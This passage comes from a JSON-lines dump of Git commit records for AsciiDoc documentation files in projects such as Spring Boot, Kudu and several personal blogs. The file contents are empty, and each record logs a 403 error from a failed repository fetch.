eshma\/spring-boot-sample,philwebb\/spring-boot-concourse,royclarkson\/spring-boot,bbrouwer\/spring-boot,candrews\/spring-boot,isopov\/spring-boot,joshiste\/spring-boot,bbrouwer\/spring-boot,htynkn\/spring-boot,shakuzen\/spring-boot,lexandro\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,jxblum\/spring-boot,rweisleder\/spring-boot,i007422\/jenkins2-course-spring-boot,joshiste\/spring-boot,shangyi0102\/spring-boot,yhj630520\/spring-boot,tsachev\/spring-boot,sbcoba\/spring-boot,shakuzen\/spring-boot,RichardCSantana\/spring-boot,SaravananParthasarathy\/SPSDemo,lexandro\/spring-boot,rweisleder\/spring-boot,mbenson\/spring-boot,qerub\/spring-boot,afroje-reshma\/spring-boot-sample,lucassaldanha\/spring-boot,kdvolder\/spring-boot,hello2009chen\/spring-boot,aahlenst\/spring-boot,candrews\/spring-boot,vakninr\/spring-boot,jayarampradhan\/spring-boot,minmay\/spring-boot,shangyi0102\/spring-boot,hqrt\/jenkins2-course-spring-boot,ptahchiev\/spring-boot,thomasdarimont\/spring-boot,xiaoleiPENG\/my-project,vakninr\/spring-boot,ollie314\/spring-boot,royclarkson\/spring-boot,ollie314\/spring-boot,joshiste\/spring-boot,brettwooldridge\/spring-boot,yangdd1205\/spring-boot,vakninr\/spring-boot,kamilszymanski\/spring-boot,mosoft521\/spring-boot,chrylis\/spring-boot,cleverjava\/jenkins2-course-spring-boot,yangdd1205\/spring-boot,ptahchiev\/spring-boot,yangdd1205\/spring-boot,michael-simons\/spring-boot,qerub\/spring-boot,philwebb\/spring-boot,kamilszymanski\/spring-boot,hello2009chen\/spring-boot,zhanhb\/spring-boot,dreis2211\/spring-boot,philwebb\/spring-boot,Buzzardo\/spring-boot,Buzzardo\/spring-boot,aahlenst\/spring-boot,mosoft521\/spring-boot,thomasdarimont\/spring-boot,nebhale\/spring-boot,vakninr\/spring-boot,sebastiankirsch\/spring-boot,mosoft521\/spring-boot,mbenson\/spring-boot,htynkn\/spring-boot,dreis2211\/spring-boot,isopov\/spring-boot,tsachev\/spring-boot,mbogoevici\/spring-boot,spring-projects\/spring-boot,mdeinum\/spring-boot,vpavic\/spring-boot,cleverjava\/jenkins2-course-spring-boot,sbcoba\/spring-boot,aahlenst\/spring-boot,scottfrederick\/spring-boot,jbovet\/spring-boot,joshthornhill\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,michael-simons\/spring-boot,yhj630520\/spring-boot,xiaoleiPENG\/my-project,shangyi0102\/spring-boot,pvorb\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,mdeinum\/spring-boot,candrews\/spring-boot,isopov\/spring-boot,hello2009chen\/spring-boot,bijukunjummen\/spring-boot,sebastiankirsch\/spring-boot,donhuvy\/spring-boot,mbogoevici\/spring-boot,lburgazzoli\/spring-boot,spring-projects\/spring-boot,Buzzardo\/spring-boot,sebastiankirsch\/spring-boot,ihoneymon\/spring-boot,lucassaldanha\/spring-boot,jayarampradhan\/spring-boot,wilkinsona\/spring-boot,ihoneymon\/spring-boot,Nowheresly\/spring-boot,akmaharshi\/jenkins,yhj630520\/spring-boot,nebhale\/spring-boot,chrylis\/spring-boot,pvorb\/spring-boot,chrylis\/spring-boot,bclozel\/spring-boot,jbovet\/spring-boot,isopov\/spring-boot,DeezCashews\/spring-boot,yhj630520\/spring-boot,candrews\/spring-boot,ilayaperumalg\/spring-boot,minmay\/spring-boot,minmay\/spring-boot,olivergierke\/spring-boot,dreis2211\/spring-boot,Nowheresly\/spring-boot,javyzheng\/spring-boot,ihoneymon\/spring-boot,jxblum\/spring-boot,jxblum\/spring-boot,SaravananParthasarathy\/SPSDemo,ihoneymon\/spring-boot,olivergierke\/spring-boot,tsachev\/spring-boot,joshthornhill\/spring-boot,pvorb\/spring-boot,hqrt\/jenkins2-course-spring-boot,tiarebalbi\/spring-boot,linead\/spring-boot,bclozel\/spring-boot,brettwooldridge\/spring-boot,brettwooldridge\/spring-boot,lburgazzoli\/spring-boot,ilayaperumalg\/spring-boot,scottfrederick\/spring-boot,ilayaperumalg\/spring-boot,tiarebalbi\/spring-boot,isopov\/spring-boot,kdvolder\/spring-boot,aahlenst\/spring-boot,ollie314\/spring-boot,javyzheng\/spring-boot,RichardCSantana\/spring-boot,philwebb\/spring-boot,mbogoevici\/spring-boot,i007422\/jenkins2-course-spring-boot,donhuvy\/spring-boot,habuma\/spring-boot,bjornlindstrom\/spring-boot,donhuvy\/spring-boot,zhanhb\/spring-boot,cleverjava\/jenkins2-course-spring-boot,wilkinsona\/spring-boot,rweisleder\/spring-boot,philwebb\/spring-boot,eddumelendez\/spring-boot,mdeinum\/spring-boot,scottfrederick\/spring-boot,jayarampradhan\/spring-boot,michael-simons\/spring-boot,lburgazzoli\/spring-boot,mbenson\/spring-boot,felipeg48\/spring-boot,chrylis\/spring-boot,felipeg48\/spring-boot,NetoDevel\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,thomasdarimont\/spring-boot,linead\/spring-boot,wilkinsona\/spring-boot,linead\/spring-boot,olivergierke\/spring-boot,tsachev\/spring-boot,wilkinsona\/spring-boot,candrews\/spring-boot,mbogoevici\/spring-boot,qerub\/spring-boot,shakuzen\/spring-boot,ptahchiev\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,tiarebalbi\/spring-boot,akmaharshi\/jenkins,sbcoba\/spring-boot,joshiste\/spring-boot,ptahchiev\/spring-boot,bbrouwer\/spring-boot,tsachev\/spring-boot,vpavic\/spring-boot,drumonii\/spring-boot,bijukunjummen\/spring-boot,deki\/spring-boot,scottfrederick\/spring-boot,zhanhb\/spring-boot,shangyi0102\/spring-boot,felipeg48\/spring-boot,habuma\/spring-boot,lexandro\/spring-boot,i007422\/jenkins2-course-spring-boot,DeezCashews\/spring-boot,rweisleder\/spring-boot,jvz\/spring-boot,zhanhb\/spring-boot,htynkn\/spring-boot,lucassaldanha\/spring-boot,bijukunjummen\/spring-boot,bijukunjummen\/spring-boot,kdvolder\/spring-boot,ptahchiev\/spring-boot,pvorb\/spring-boot,jxblum\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,kdvolder\/spring-boot,bclozel\/spring-boot,tsachev\/spring-boot,cleverjava\/jenkins2-course-spring-boot,dreis2211\/spring-boot,habuma\/spring-boot,minmay\/spring-boot,herau\/spring-boot,SaravananParthasarathy\/SPSDemo,bijukunjummen\/spring-boot,drumonii\/spring-boot,aahlenst\/spring-boot,habuma\/spring-boot,sbcoba\/spring-boot,htynkn\/spring-boot,donhuvy\/spring-boot,herau\/spring-boot,deki\/spring-boot,donhuvy\/spring-boot,deki\/spring-boot,pvorb\/spring-boot,cleverjava\/jenkins2-course-spring-boot,nebhale\/spring-boot,lucassaldanha\/spring-boot,drumonii\/spring-boot,zhanhb\/spring-boot,hello2009chen\/spring-boot,hqrt\/jenkins2-course-spring-boot,Buzzardo\/spring-boot,joshthornhill\/spring-boot,spring-projects\/spring-boot,ollie314\/spring-boot,spring-projects\/spring-boot,joshiste\/spring-boot,Nowheresly\/spring-boot,drumonii\/spring-boot,sbcoba\/spring-boot,ilayaperumalg\/spring-boot,Buzzardo\/spring-boot,deki\/spring-boot,lburgazzoli\/spring-boot,isopov\/spring-boot,philwebb\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,ilayaperumalg\/spring-boot,herau\/spring-boot,bjornlindstrom\/spring-boot,minmay\/spring-boot,herau\/spring-boot,eddumelendez\/spring-boot,bjornlindstrom\/spring-boot,philwebb\/spring-boot-concourse,kamilszymanski\/spring-boot,javyzheng\/spring-boot,yhj630520\/spring-boot,habuma\/spring-boot,aahlenst\/spring-boot,drumonii\/spring-boot,habuma\/spring-boot,royclarkson\/spring-boot,rweisleder\/spring-boot,SaravananParthasarathy\/SPSDemo,kamilszymanski\/spring-boot,hello2009chen\/spring-boot,lexandro\/spring-boot,tiarebalbi\/spring-boot,deki\/spring-boot,xiaoleiPENG\/my-project,i007422\/jenkins2-course-spring-boot,hqrt\/jenkins2-course-spring-boot,scottfrederick\/spring-boot,jbovet\/spring-boot,afroje-reshma\/spring-boot-sample,michael-simons\/spring-boot,qerub\/spring-boot,bclozel\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,jayarampradhan\/spring-boot,lburgazzoli\/spring-boot,philwebb\/spring-boot,sebastiankirsch\/spring-boot,shakuzen\/spring-boot,qerub\/spring-boot,spring-projects\/spring-boot,thomasdarimont\/spring-boot,joshthornhill\/spring-boot,DeezCashews\/spring-boot,vpavic\/spring-boot,i007422\/jenkins2-course-spring-boot,vpavic\/spring-boot,mdeinum\/spring-boot,thomasdarimont\/spring-boot,hqrt\/jenkins2-course-spring-boot,jbovet\/spring-boot,jxblum\/spring-boot,joshiste\/spring-boot,shangyi0102\/spring-boot,zhanhb\/spring-boot,drumonii\/spring-boot,DeezCashews\/spring-boot,linead\/spring-boot,htynkn\/spring-boot,scottfrederick\/spring-boot,SaravananParthasarathy\/SPSDemo,herau\/spring-boot,brettwooldridge\/spring-boot,dreis2211\/spring-boot,mdeinum\/spring-boot,NetoDevel\/spring-boot,bjornlindstrom\/spring-boot,bjornlindstrom\/spring-boot,NetoDevel\/spring-boot,jvz\/spring-boot,afroje-reshma\/spring-boot-sample,bclozel\/spring-boot,xiaoleiPENG\/my-project,michael-simons\/spring-boot,NetoDevel\/spring-boot,vakninr\/spring-boot,chrylis\/spring-boot,eddumelendez\/spring-boot,dreis2211\/spring-boot,lucassaldanha\/spring-boot,ptahchiev\/spring-boot,akmaharshi\/jenkins,olivergierke\/spring-boot,olivergierke\/spring-boot,RichardCSantana\/spring-boot,donhuvy\/spring-boot,mbenson\/spring-boot,xiaoleiPENG\/my-project,mbenson\/spring-boot,spring-projects\/spring-boot,htynkn\/spring-boot,rweisleder\/spring-boot,felipeg48\/spring-boot,afroje-reshma\/spring-boot-sample,lexandro\/spring-boot,kdvolder\/spring-boot,eddumelendez\/spring-boot,brettwooldridge\/spring-boot","old_file":"spring-boot-samples\/spring-boot-sample-cache\/README.adoc","new_file":"spring-boot-samples\/spring-boot-sample-cache\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6fd5c2a80bda76b2fb699909afade6982191dd17","subject":"docs: Explain transaction content","message":"docs: Explain transaction content\n\nSigned-off-by: jaa127 <5d4b395afd293423da3540113194aa7266e85bd8@sn127.fi>","repos":"jaa127\/tackler,jaa127\/tackler,jaa127\/tackler","old_file":"docs\/journal.adoc","new_file":"docs\/journal.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaa127\/tackler.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"835f0994e73a107c2f41639b8bd3e148798388e3","subject":"Update 2016-02-15-Test.adoc","message":"Update 2016-02-15-Test.adoc","repos":"hitamutable\/hitamutable.github.io,hitamutable\/hitamutable.github.io,hitamutable\/hitamutable.github.io,hitamutable\/hitamutable.github.io","old_file":"_posts\/2016-02-15-Test.adoc","new_file":"_posts\/2016-02-15-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hitamutable\/hitamutable.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"14e4e10cf30360ad8ef28a52d9793feb859d156a","subject":"Update 2015-01-31-Blog-Title.adoc","message":"Update 2015-01-31-Blog-Title.adoc","repos":"rohithkrajan\/rohithkrajan.github.io,rohithkrajan\/rohithkrajan.github.io,rohithkrajan\/rohithkrajan.github.io,rohithkrajan\/rohithkrajan.github.io","old_file":"_posts\/2015-01-31-Blog-Title.adoc","new_file":"_posts\/2015-01-31-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rohithkrajan\/rohithkrajan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c158050a889c980b15520c166e0cfac89f72c99","subject":"Update 2016-06-28-First-post.adoc","message":"Update 2016-06-28-First-post.adoc","repos":"darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io","old_file":"_posts\/2016-06-28-First-post.adoc","new_file":"_posts\/2016-06-28-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darsto\/darsto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b5079472e861b9a0fb1ba1f364c5e3090b168272","subject":"Update 2017-03-22-more-bread.adoc","message":"Update 2017-03-22-more-bread.adoc","repos":"thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io","old_file":"_posts\/2017-03-22-more-bread.adoc","new_file":"_posts\/2017-03-22-more-bread.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thomaszahr\/thomaszahr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2af5285db589e959d1bbe0e13196943f52440d0d","subject":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","message":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"132dec3149dec5fce99e9cd3084a285220f6ddce","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed813455017674515f61b4aae6d72112e83d734a","subject":"ASCIIDoc formatted the protocol notes for the 790IT Blood Pressure Monitor","message":"ASCIIDoc formatted the protocol notes for the 790IT Blood Pressure Monitor\n","repos":"openyou\/libomron,openyou\/libomron,openyou\/libomron","old_file":"doc\/omron_protocol_notes.asciidoc","new_file":"doc\/omron_protocol_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/openyou\/libomron.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"ed067a82fe5f183d5aebc06974494de54eab210b","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of index.adoc\n","repos":"spring-cloud\/spring-cloud-aws","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-aws.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3be98fb6fb8959d4ec65127253f0997512e3e46c","subject":"doc: implementers-guide: convert to ODP standard layout","message":"doc: implementers-guide: convert to ODP standard layout\n\nSigned-off-by: Mike Holmes <ed44c09f4d7f698f5510adc894a872c73e08c8bd@linaro.org>\nReviewed-by: Bill Fischofer <52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nSigned-off-by: Maxim Uvarov <db4d16e02ae2d7493db430203537da8b2e34f290@linaro.org>\n","repos":"mike-holmes-linaro\/odp,erachmi\/odp,rsalveti\/odp,rsalveti\/odp,kalray\/odp-mppa,kalray\/odp-mppa,rsalveti\/odp,nmorey\/odp,erachmi\/odp,rsalveti\/odp,kalray\/odp-mppa,ravineet-singh\/odp,erachmi\/odp,ravineet-singh\/odp,kalray\/odp-mppa,kalray\/odp-mppa,ravineet-singh\/odp,dkrot\/odp,mike-holmes-linaro\/odp,rsalveti\/odp,kalray\/odp-mppa,erachmi\/odp,nmorey\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,mike-holmes-linaro\/odp,kalray\/odp-mppa,dkrot\/odp,nmorey\/odp,dkrot\/odp,nmorey\/odp,dkrot\/odp","old_file":"doc\/implementers-guide\/implementers-guide.adoc","new_file":"doc\/implementers-guide\/implementers-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"2b023ee40d0403fd13145b0cf3d1bebe343a102e","subject":"y2b create post This New Smartphone Might Surprise You...","message":"y2b create post This New Smartphone Might Surprise You...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-01-03-This-New-Smartphone-Might-Surprise-You.adoc","new_file":"_posts\/2017-01-03-This-New-Smartphone-Might-Surprise-You.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"356cc0b2a95769eb0a4d5b0ff17b6e0cf870d10d","subject":"Added a CONTRIBUTING notice","message":"Added a CONTRIBUTING notice\n","repos":"jeteve\/elasticsearch-perl,adjust\/elasticsearch-perl,elastic\/elasticsearch-perl,jeteve\/elasticsearch-perl,adjust\/elasticsearch-perl,elastic\/elasticsearch-perl,jeteve\/elasticsearch-perl,adjust\/elasticsearch-perl","old_file":"CONTRIBUTING.asciidoc","new_file":"CONTRIBUTING.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adjust\/elasticsearch-perl.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a65bbcc8e939ae48e5f8b3aa7bde9a46169a874c","subject":"Add from-source installation instructions for SLES 12","message":"Add from-source installation instructions for SLES 12\n\nChange-Id: I664fd72f0dfdc6801012ee0d9f972cc05679cbd5\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1863\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nTested-by: Internal Jenkins\n","repos":"EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"612fa1ed97b55950a8bc229f27301f3151fd2cf7","subject":"Create Deeper\/testchapter.adoc","message":"Create Deeper\/testchapter.adoc","repos":"JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook","old_file":"Deeper\/testchapter.adoc","new_file":"Deeper\/testchapter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JClingo\/gitbook.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"a883a792e332d658ea65ed8e6f2c9d5843fac970","subject":"Update 2016-12-2-3-D.adoc","message":"Update 2016-12-2-3-D.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-2-3-D.adoc","new_file":"_posts\/2016-12-2-3-D.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5efa26539711e59e871ed29a81a1ccbcae71787f","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd28aaf7279480592f149d6e2da0e9f09454d6ac","subject":"create post OnePlus 5T Lava Red Unboxing - $500 Can't Go Further","message":"create post OnePlus 5T Lava Red Unboxing - $500 Can't Go Further","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-OnePlus-5T-Lava-Red-Unboxing---500-Cant-Go-Further.adoc","new_file":"_posts\/2018-02-26-OnePlus-5T-Lava-Red-Unboxing---500-Cant-Go-Further.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f93ee5716e13c4aa4c8e27e81df1bb83c4173e1d","subject":"Update 2015-11-23-Sispmctl.adoc","message":"Update 2015-11-23-Sispmctl.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2015-11-23-Sispmctl.adoc","new_file":"_posts\/2015-11-23-Sispmctl.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4cb32d773a6ed8d04465b70dc9852b7997306853","subject":"Update 2017-09-01-Ethereum.adoc","message":"Update 2017-09-01-Ethereum.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-01-Ethereum.adoc","new_file":"_posts\/2017-09-01-Ethereum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36fabb15105540ef84171f1adb3cf8a031a7ced4","subject":"add news","message":"add news\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/01\/14\/clojure-2021-survey.adoc","new_file":"content\/news\/2021\/01\/14\/clojure-2021-survey.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"195fee6e6e70510f8c056fcc73e43a5a864f5d06","subject":"y2b create post 2.7GHz Quad-Core MacBook Pro Unboxing (Super MacBook Pro Project 2013)","message":"y2b create post 2.7GHz Quad-Core MacBook Pro Unboxing (Super MacBook Pro Project 2013)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-06-19-27GHz-QuadCore-MacBook-Pro-Unboxing-Super-MacBook-Pro-Project-2013.adoc","new_file":"_posts\/2013-06-19-27GHz-QuadCore-MacBook-Pro-Unboxing-Super-MacBook-Pro-Project-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08aa61d7bf47c0af17747b00d76a36987e691e00","subject":"Update 2016-02-06-Maya-scene-cleanup.adoc","message":"Update 2016-02-06-Maya-scene-cleanup.adoc","repos":"Kif11\/Kif11.github.io,Kif11\/Kif11.github.io,Kif11\/Kif11.github.io,Kif11\/Kif11.github.io","old_file":"_posts\/2016-02-06-Maya-scene-cleanup.adoc","new_file":"_posts\/2016-02-06-Maya-scene-cleanup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Kif11\/Kif11.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7984c9f02322ee9a564842f4235ff474ba36e3b","subject":"Update 2017-03-23-One-Time-Pad-by-Z3.adoc","message":"Update 2017-03-23-One-Time-Pad-by-Z3.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-03-23-One-Time-Pad-by-Z3.adoc","new_file":"_posts\/2017-03-23-One-Time-Pad-by-Z3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"44c2192f362f7f167ed6460326365795f773aa93","subject":"Add instructions for running multibinder examples.","message":"Add instructions for running multibinder examples.\n","repos":"garyrussell\/spring-cloud-stream,pperalta\/spring-cloud-stream,dsyer\/spring-cloud-stream,mbogoevici\/spring-cloud-stream,markpollack\/spring-cloud-stream,markfisher\/spring-cloud-stream,dturanski\/spring-cloud-stream,garyrussell\/spring-cloud-stream,pperalta\/spring-cloud-stream,markfisher\/spring-cloud-stream,dsyer\/spring-cloud-stream,markpollack\/spring-cloud-stream,ghillert\/spring-cloud-streams,viniciusccarvalho\/spring-cloud-stream,markpollack\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,garyrussell\/spring-cloud-stream,mbogoevici\/spring-cloud-stream,dturanski\/spring-cloud-stream,markfisher\/spring-cloud-stream,viniciusccarvalho\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,ilayaperumalg\/spring-cloud-stream,dsyer\/spring-cloud-stream,ilayaperumalg\/spring-cloud-stream,viniciusccarvalho\/spring-cloud-stream,mbogoevici\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,dturanski\/spring-cloud-stream,pperalta\/spring-cloud-stream","old_file":"spring-cloud-stream-samples\/multibinder-differentsystems\/README.adoc","new_file":"spring-cloud-stream-samples\/multibinder-differentsystems\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dturanski\/spring-cloud-stream.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"37308208a0b9fc98a1cfc3cb51823595070af70e","subject":"[doc] Add description of HOWL log internals","message":"[doc] Add description of HOWL log internals\n\ngit-svn-id: f3027bd689517dd712b868b0d3f5f59c3162b83d@1794325 13f79535-47bb-0310-9956-ffa450edef68\n","repos":"tomdw\/aries,tomdw\/aries,fwassmer\/aries,fwassmer\/aries,tomdw\/aries,tomdw\/aries,fwassmer\/aries,fwassmer\/aries","old_file":"transaction\/transaction-manager\/internals.adoc","new_file":"transaction\/transaction-manager\/internals.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tomdw\/aries.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"92f4652ca0e3134a8f248ce6450c95b8f328f82d","subject":"[WFLY-11622] Update documentation for multiple delivery groups in MDBs","message":"[WFLY-11622] Update documentation for multiple delivery groups in 